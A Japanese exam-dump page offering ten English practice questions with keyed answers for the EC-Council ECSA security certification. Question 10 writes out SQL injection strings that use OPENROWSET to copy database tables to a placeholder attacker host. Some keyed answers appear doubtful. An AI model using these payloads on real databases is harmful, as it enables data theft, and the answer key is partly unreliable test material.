412-79v8無料問題集「EC-COUNCIL EC-Council Certified Security Analyst (ECSA)」

質問 1

Amazon, an IT based company, conducts a survey on the usage of the Internet. They found that company employees spend most of the time at work surfing the web for their personal use and for inappropriate web site viewing. Management decide to block all such web sites using URL filtering software.

How can employees continue to see the blocked websites?

（A）Using encryption

（B）Using proxy servers

（C）Using authentication

（D）Using session hijacking

正解：B 解答を投票する

質問 2

A penetration tester performs OS fingerprinting on the target server to identify the operating system used on the target server with the help of ICMP packets.

While performing ICMP scanning using Nmap tool, message received/type displays "3 - Destination Unreachable[5]" and code 3.
Which of the following is an appropriate description of this response?

（A）Destination port unreachable

（B）Destination host unreachable

（C）Destination protocol unreachable

（D）Destination host unavailable

正解：A 解答を投票する

質問 3

Which of the following policy forbids everything with strict restrictions on all usage of the company systems and network?

（A）Paranoid Policy

（B）Promiscuous Policy

（C）Information-Protection Policy

（D）Prudent Policy

正解：A 解答を投票する

質問 4

Network scanning is used to identify the available network resources. Which one of the following is also known as a half-open scan, because a full TCP connection is never completed and it is used to determine which ports are open and listening on a target device?

（A）SYN Scan

（B）TCP Connect Scan

（C）Null Scan

（D）XMAS Scan

正解：A 解答を投票する

質問 5

What is a goal of the penetration testing report?

（A）The penetration testing report allows you to increase sales performance by effectively communicating with the internal security team.

（B）The penetration testing report allows you to sleep better at night thinking your organization is protected

（C）The pen testing report helps executive management to make decisions on implementing security controls in the organization and helps the security team implement security controls and patch any flaws discovered during testing.

（D）The penetration testing report helps you comply with local laws and regulations related to environmental conditions in the organization.

正解：C 解答を投票する

質問 6

Which one of the following tools of trade is an automated, comprehensive penetration testing product for assessing the specific information security threats to an organization?

（A）Canvas

（B）CORE Impact

（C）Microsoft Baseline Security Analyzer (MBSA)

（D）Sunbelt Network Security Inspector (SNSI)

正解：A 解答を投票する

質問 7

A man enters a PIN number at an ATM machine, being unaware that the person next to him was watching. Which of the following social engineering techniques refers to this type of information theft?

（A）Phishing

（B）Vishing

（C）Insider Accomplice

（D）Shoulder surfing

正解：D 解答を投票する

質問 8

Which type of vulnerability assessment tool provides security to the IT system by testing for vulnerabilities in the applications and operation system?

（A）Application-layer Vulnerability Assessment Tools

（B）Scope Assessment Tools

（C）Location/Data Examined Tools

（D）Active/Passive Tools

正解：B 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 9

Logs are the record of the system and network activities. Syslog protocol is used for delivering log information across an IP network. Syslog messages can be sent via which one of the following?

（A）TCP and SMTP

（B）UDP and SMTP

（C）UDP and TCP

（D）SMTP

正解：C 解答を投票する

質問 10

A penetration tester tries to transfer the database from the target machine to a different machine. For this, he uses OPENROWSET to link the target database to his own database, replicates the database structure, and transfers the data to his machine by via a connection to the remote machine on port 80.
The query he used to transfer databases was:
'; insert into OPENROWSET ('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..hacked_sysdatabases') select * from master.dbo.sysdatabases -
The query he used to transfer table 1 was:
'; insert into OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..table1') select * from database..table1 -
What query does he need in order to transfer the column?

（A）'; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;','sel ect *from mydatabase..hacked_syscolumns') select * from user_database.dbo.systables -

（B）'; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;','sel ect * from mydatabase..hacked_syscolumns') select * from user_tables.dbo.syscolumns -

（C）'; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;','sel ect * from mydatabase..hacked_syscolumns') select * from user_database.dbo.syscolumns -

（D）'; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;','sel ect * from mydatabase..hacked_syscolumns') select * from user_database.dbo.sysrows -

正解：C 解答を投票する

412-79v8 無料問題集「EC-COUNCIL EC-Council Certified Security Analyst (ECSA)」

弊社を連絡する

関連リンク

トップ試験